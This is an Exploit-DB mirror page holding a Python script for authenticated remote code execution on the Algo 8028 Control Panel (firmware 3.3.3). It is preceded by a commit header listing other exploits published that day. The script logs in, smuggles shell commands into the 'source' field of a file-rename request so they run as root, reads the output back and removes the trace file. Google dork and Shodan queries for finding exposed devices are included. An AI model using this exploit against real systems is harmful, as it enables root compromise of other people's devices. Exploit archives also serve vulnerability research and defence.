bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/remote/50960.py
Offensive Security 29e275db94 DB: 2022-06-15 
16 changes to exploits/shellcodes

Real Player v.20.0.8.310 G2 Control - 'DoGoToURL()' Remote Code Execution (RCE)
Real Player 16.0.3.51 - 'external::Import()' Directory Traversal to Remote Code Execution (RCE)
HP LaserJet Professional M1210 MFP Series Receive Fax Service - Unquoted Service Path
Marval MSM v14.19.0.12476 - Remote Code Execution (RCE) (Authenticated)
Virtua Software Cobranca 12S - SQLi
Marval MSM v14.19.0.12476 - Cross-Site Request Forgery (CSRF)
Algo 8028 Control Panel - Remote Code Execution (RCE) (Authenticated)
TP-Link Router AX50 firmware 210730 - Remote Code Execution (RCE) (Authenticated)
Sourcegraph Gitserver 3.36.3 - Remote Code Execution (RCE)
Avantune Genialcloud ProJ 10 - Cross-Site Scripting (XSS)
Pandora FMS v7.0NG.742 - Remote Code Execution (RCE) (Authenticated)
phpIPAM 1.4.5 - Remote Code Execution (RCE) (Authenticated)
ChurchCRM 4.4.5 - SQLi
Old Age Home Management System 1.0 - SQLi Authentication Bypass
SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting (XSS)
SolarView Compact 6.00 - 'pow' Cross-Site Scripting (XSS)
2022-06-15 05:01:57 +00:00

81 lines
No EOL
2.4 KiB
Python
Executable file
Raw Blame History

# Exploit Title: Algo 8028 Control Panel - Remote Code Execution (RCE) (Authenticated)
# Google Dork: intitle:"Algo 8028 Control Panel"
# Shodan: title:"Algo 8028 Control Panel"
# Date: 2022-06-07
# Exploit Author: Filip Carlsson
# Vendor Homepage: https://www.algosolutions.com/
# Software Link: https://www.algosolutions.com/firmware-downloads/8028-firmware-selection/
# Version: 3.3.3
# Tested on: Version 3.3.3
# CVE : N/A
# Exploit:
# Due to bad sanitation in http://<IP:PORT>/control/fm-data.lua you can do command injection as root
# Request: POST
# Formdata:
# action: rename
# source: /a";echo $(id) 2>&1 > /opt/algo/web/root/cmd.txt;"
# target: /
#!/usr/bin/env python3
import sys
import requests
cookie=None
def main():
# check if provided 3 args
if len(sys.argv) != 4:
print_help()
return
else:
host = sys.argv[1]
password = sys.argv[2]
command = sys.argv[3]
if login(host, password):
# if login was successful, send command
send_command(host, command)
def print_help():
print("Usage: algo.py 192.168.1.123 password command")
print("Example: algo.py 192.168.123 algo \"cat /etc/passwd\"")
def login(host, password):
url = f"http://{host}/index.lua"
data = {"pwd": password}
res = requests.post(url, data=data)
# check if html contains "Invalid Password"
if "Invalid Password" in res.text:
print("Invalid password")
return False
else:
# save cookie
global cookie
cookie = res.cookies
print("Successfully logged in\n")
return True
def send_command(host, command):
url = f"http://{host}/control/fm-data.lua"
data = {"action": "rename", "source": f"/a\";echo $({command}) 2>&1 > /opt/algo/web/root/a.txt;\"", "target": "/"}
res = requests.post(url, data=data, cookies=cookie)
# get http://host/cmd.txt
url = f"http://{host}/a.txt"
res = requests.get(url)
# if "404 Not Found" in text then command was not executed
if "404 Not Found" in res.text:
print("Command was not executed (404)")
else:
print(res.text)
# delete cmd.txt
url = f"http://{host}/control/fm-data.lua"
data = {"action": "rename", "source": f"/a\";$(rm -rf /opt/algo/web/root/a.txt);\"", "target": "/"}
requests.post(url, data=data, cookies=cookie)
if __name__ == "__main__":
main()
Reference in a new issue View git blame Copy permalink